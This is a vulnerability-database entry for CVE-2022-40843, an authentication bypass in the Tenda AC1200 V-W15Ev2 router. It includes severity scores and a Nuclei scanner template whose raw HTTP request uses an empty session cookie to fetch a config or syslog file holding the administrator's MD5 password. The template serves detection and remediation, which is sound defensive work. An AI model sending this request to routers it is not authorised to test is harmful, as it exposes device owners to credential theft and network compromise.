Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-40843
HistoryNov 03, 2022 - 12:01 a.m.

Tenda AC1200 V-W15Ev2 - Authentication Bypass

2022-11-0300:01:10
ProjectDiscovery
github.com
8
tenda router
authentication bypass
improper authorization
session management
unauthenticated attackers
md5 password
remote management

4.9 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

5.2 Medium

AI Score

Confidence

High

0.186 Low

EPSS

Percentile

96.3%

The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console.
id: CVE-2022-40843

info:
  name: Tenda AC1200 V-W15Ev2 - Authentication Bypass
  author: gy741
  severity: medium
  description: |
    The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized configuration changes, network compromise, and potential access to sensitive information.
  remediation: |
    Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability.
  reference:
    - https://boschko.ca/tenda_ac1200_router
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40843
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 4.9
    cve-id: CVE-2022-40843
    cwe-id: CWE-287
    epss-score: 0.37501
    epss-percentile: 0.97193
    cpe: cpe:2.3:h:tenda:ac1200_v-w15ev2:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: tenda
    product: ac1200_v-w15ev2
  tags: cve2022,cve,tenda,auth-bypass,router,iot

http:
  - raw:
      - |
        GET /goform/downloadSyslog/syslog.log HTTP/1.1
        Host: {{Hostname}}
        Cookie: W15Ev2_user=

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '^0\d{3}$'

      - type: word
        part: body
        words:
          - "[system]"
          - "[error]"
          - "[wan1]"
        condition: or

      - type: word
        part: header
        words:
          - "Content-type: config/conf"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207422cca17346734af8803e05435d968ee607fb4d1020131202813e2275ce90fd022100d04e21dd1aeed78f39fe54ffd517fc0697342080ce5c9031dc72b12c2278db35:922c64590222798bb761d5b6d8e72950

4.9 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

5.2 Medium

AI Score

Confidence

High

0.186 Low

EPSS

Percentile

96.3%

Related for NUCLEI:CVE-2022-40843